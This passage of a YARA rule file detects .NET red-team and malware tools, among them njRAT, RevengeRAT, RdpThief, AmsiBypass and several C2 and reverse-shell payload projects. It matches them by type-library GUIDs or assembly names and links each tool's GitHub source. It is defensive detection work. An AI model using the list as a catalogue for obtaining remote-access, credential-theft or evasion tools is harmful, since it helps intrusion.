    $typelibguid14 = "f1ab854b-6282-4bdf-8b8b-f2911a008948" ascii wide nocase
    $typelibguid15 = "aef6547e-3822-4f96-9708-bcf008129b2b" ascii wide nocase
    $typelibguid16 = "a336f517-bca9-465f-8ff8-2756cfd0cad9" ascii wide nocase
    $typelibguid17 = "5de018bd-941d-4a5d-bed5-fbdd111aba76" ascii wide nocase
    $typelibguid18 = "bbfac1f9-cd4f-4c44-af94-1130168494d0" ascii wide nocase
    $typelibguid19 = "1c79cea1-ebf3-494c-90a8-51691df41b86" ascii wide nocase
    $typelibguid20 = "927104e1-aa17-4167-817c-7673fe26d46e" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_njRAT {
  meta:
    description = "Detects VB.NET red/black-team tools via typelibguid"
    reference = "https://github.com/mwsrc/njRAT"
    author = "Arnim Rupp"
    date = "2020-12-30"
  strings:
    $typelibguid0 = "5a542c1b-2d36-4c31-b039-26a88d3967da" ascii wide nocase
    $typelibguid1 = "6b07082a-9256-42c3-999a-665e9de49f33" ascii wide nocase
    $typelibguid2 = "c0a9a70f-63e8-42ca-965d-73a1bc903e62" ascii wide nocase
    $typelibguid3 = "70bd11de-7da1-4a89-b459-8daacc930c20" ascii wide nocase
    $typelibguid4 = "fc790ee5-163a-40f9-a1e2-9863c290ff8b" ascii wide nocase
    $typelibguid5 = "cb3c28b2-2a4f-4114-941c-ce929fec94d3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Manager {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/TheWover/Manager"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "dda73ee9-0f41-4c09-9cad-8215abd60b33" ascii wide nocase
    $typelibguid1 = "6a0f2422-d4d1-4b7e-84ad-56dc0fd2dfc5" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_neo_ConfuserEx {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/XenocodeRCE/neo-ConfuserEx"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "e98490bb-63e5-492d-b14e-304de928f81a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpAllowedToAct {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/pkb1s/SharpAllowedToAct"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "dac5448a-4ad1-490a-846a-18e4e3e0cf9a" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SuperSQLInjectionV1 {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/shack2/SuperSQLInjectionV1"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "d5688068-fc89-467d-913f-037a785caca7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_ADSearch {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/tomcarver16/ADSearch"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_privilege_escalation_awesome_scripts_suite {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "1928358e-a64b-493f-a741-ae8e3d029374" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CVE_2020_1206_POC {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/ZecOps/CVE-2020-1206-POC"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii wide nocase
    $typelibguid1 = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii wide nocase
    $typelibguid2 = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DInvoke {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/TheWover/DInvoke"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpChisel {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/shantanu561993/SharpChisel"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpScribbles {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/V1V1/SharpScribbles"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii wide nocase
    $typelibguid1 = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpReg {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/jnqpblc/SharpReg"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_MemeVM {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/TobitoFatitoRE/MemeVM"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii wide nocase
    $typelibguid1 = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii wide nocase
    $typelibguid2 = "14d5d12e-9a32-4516-904e-df3393626317" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpDir {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/jnqpblc/SharpDir"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_AtYourService {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/mitchmoser/AtYourService"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_LockLess {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/GhostPack/LockLess"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_EasyNet {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/TheWover/EasyNet"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "3097d856-25c2-42c9-8d59-2cdad8e8ea12" ascii wide nocase
    $typelibguid1 = "ba33f716-91e0-4cf7-b9bd-b4d558f9a173" ascii wide nocase
    $typelibguid2 = "37d6dd3f-5457-4d8b-a2e1-c7b156b176e5" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpByeBear {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/S3cur3Th1sSh1t/SharpByeBear"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "a6b84e35-2112-4df2-a31b-50fde4458c5e" ascii wide nocase
    $typelibguid1 = "3e82f538-6336-4fff-aeec-e774676205da" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpHide {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/outflanknl/SharpHide"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "443d8cbf-899c-4c22-b4f6-b7ac202d4e37" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpSvc {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/jnqpblc/SharpSvc"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "52856b03-5acd-45e0-828e-13ccb16942d1" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpCrashEventLog {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/slyd0g/SharpCrashEventLog"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "98cb495f-4d47-4722-b08f-cefab2282b18" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_DotNetToJScript_LanguageModeBreakout {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/FuzzySecurity/DotNetToJScript-LanguageModeBreakout"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "deadb33f-fa94-41b5-813d-e72d8677a0cf" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharPermission {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/mitchmoser/SharPermission"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "84d2b661-3267-49c8-9f51-8f72f21aea47" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_RegistryStrikesBack {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/mdsecactivebreach/RegistryStrikesBack"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "90ebd469-d780-4431-9bd8-014b00057665" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_CloneVault {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/mdsecactivebreach/CloneVault"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "0a344f52-6780-4d10-9a4a-cb9439f9d3de" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_donut {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/TheWover/donut"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "98ca74c7-a074-434d-9772-75896e73ceaa" ascii wide nocase
    $typelibguid1 = "3c9a6b88-bed2-4ba8-964c-77ec29bf1846" ascii wide nocase
    $typelibguid2 = "4fcdf3a3-aeef-43ea-9297-0d3bde3bdad2" ascii wide nocase
    $typelibguid3 = "361c69f5-7885-4931-949a-b91eeab170e3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_SharpHandler {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/jfmaes/SharpHandler"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "46e39aed-0cff-47c6-8a63-6826f147d7bd" ascii wide nocase
    $typelibguid1 = "11dc83c6-8186-4887-b228-9dc4fd281a23" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_Driver_Template {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/FuzzySecurity/Driver-Template"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "bdb79ad6-639f-4dc2-8b8a-cd9107da3d69" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_GUID_NashaVM {
  meta:
    description = "Detects .NET red/black-team tools via typelibguid"
    reference = "https://github.com/Mrakovic-ORG/NashaVM"
    author = "Arnim Rupp"
    date = "2021-01-21"
  strings:
    $typelibguid0 = "f9e63498-6e92-4afd-8c13-4f63a3d964c3" ascii wide nocase
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and any of them
}

rule HKTL_NET_NAME_FakeFileMaker {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DamonMohammadbagher/FakeFileMaker"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "FakeFileMaker" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_Aggressor {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/k8gege/Aggressor"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "Aggressor" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_pentestscripts {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/c4bbage/pentestscripts"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "pentestscripts" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_WMIPersistence {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/mdsecactivebreach/WMIPersistence"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "WMIPersistence" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_ADCollector {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/dev-2null/ADCollector"
    hash = "5391239f479c26e699b6f3a1d6a0a8aa1a0cf9a8"
    hash = "9dd0f322dd57b906da1e543c44e764954704abae"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "ADCollector" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_MaliciousClickOnceGenerator {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/Mr-Un1k0d3r/MaliciousClickOnceGenerator"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "MaliciousClickOnceGenerator" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_directInjectorPOC {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/badBounty/directInjectorPOC"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "directInjectorPOC" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_AsStrongAsFuck {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/Charterino/AsStrongAsFuck"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "AsStrongAsFuck" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_MagentoScanner {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/soufianetahiri/MagentoScanner"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "MagentoScanner" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_RevengeRAT_Stub_CSsharp {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/NYAN-x-CAT/RevengeRAT-Stub-CSsharp"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "RevengeRAT-Stub-CSsharp" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_SharPyShell {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/antonioCoco/SharPyShell"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "SharPyShell" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_GhostLoader {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/TheWover/GhostLoader"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "GhostLoader" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_DotNetInject {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/dtrizna/DotNetInject"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "DotNetInject" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_ATPMiniDump {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/b4rtik/ATPMiniDump"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "ATPMiniDump" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_ConfuserEx {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/yck1509/ConfuserEx"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "ConfuserEx" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_SharpBuster {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/passthehashbrowns/SharpBuster"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "SharpBuster" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_AmsiBypass {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/0xB455/AmsiBypass"
    hash = "8fa4ba512b34a898c4564a8eac254b6a786d195b"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "AmsiBypass" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_Recon_AD {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/outflanknl/Recon-AD"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "Recon-AD" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_SharpWatchdogs {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/RITRedteam/SharpWatchdogs"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "SharpWatchdogs" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_SharpCat {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/Cn33liz/SharpCat"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "SharpCat" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_aspnetcore_bypassing_authentication {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/jackowild/aspnetcore-bypassing-authentication"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "aspnetcore-bypassing-authentication" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_K8tools {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/k8gege/K8tools"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "K8tools" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_HTTPSBeaconShell {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/limbenjamin/HTTPSBeaconShell"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "HTTPSBeaconShell" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_Ghostpack_CompiledBinaries {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "Ghostpack-CompiledBinaries" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_metasploit_sharp {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/VolatileMindsLLC/metasploit-sharp"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "metasploit-sharp" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_trevorc2 {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/trustedsec/trevorc2"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "trevorc2" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_petaqc2 {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/fozavci/petaqc2"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "petaqc2" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_NativePayload_DNS2 {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DamonMohammadbagher/NativePayload_DNS2"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "NativePayload_DNS2" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_cve_2017_7269_tool {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/zcgonvh/cve-2017-7269-tool"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "cve-2017-7269-tool" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_AggressiveProxy {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/EncodeGroup/AggressiveProxy"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "AggressiveProxy" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_MSBuildAPICaller {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/rvrsh3ll/MSBuildAPICaller"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "MSBuildAPICaller" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_GrayKeylogger {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DarkSecDevelopers/GrayKeylogger"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "GrayKeylogger" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_weevely3 {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/epinna/weevely3"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "weevely3" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_FudgeC2 {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/Ziconius/FudgeC2"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "FudgeC2" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_NativePayload_Reverse_tcp {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "NativePayload_Reverse_tcp" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_SharpHose {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/ustayready/SharpHose"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "SharpHose" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_RAT_NjRat_0_7d_modded_source_code {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/AliBawazeEer/RAT-NjRat-0.7d-modded-source-code"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "RAT-NjRat-0.7d-modded-source-code" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_RdpThief {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/0x09AL/RdpThief"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "RdpThief" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_RunasCs {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/antonioCoco/RunasCs"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "RunasCs" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_NativePayload_IP6DNS {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DamonMohammadbagher/NativePayload_IP6DNS"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
    $name = "NativePayload_IP6DNS" ascii wide
    $compile = "AssemblyTitle" ascii wide
  condition:
    (uint16(0) == 23117 and uint32(uint32(60)) == 17744) and all of them
}

rule HKTL_NET_NAME_NativePayload_ARP {
  meta:
    description = "Detects .NET red/black-team tools via name"
    reference = "https://github.com/DamonMohammadbagher/NativePayload_ARP"
    author = "Arnim Rupp"
    date = "2021-01-22"
  strings:
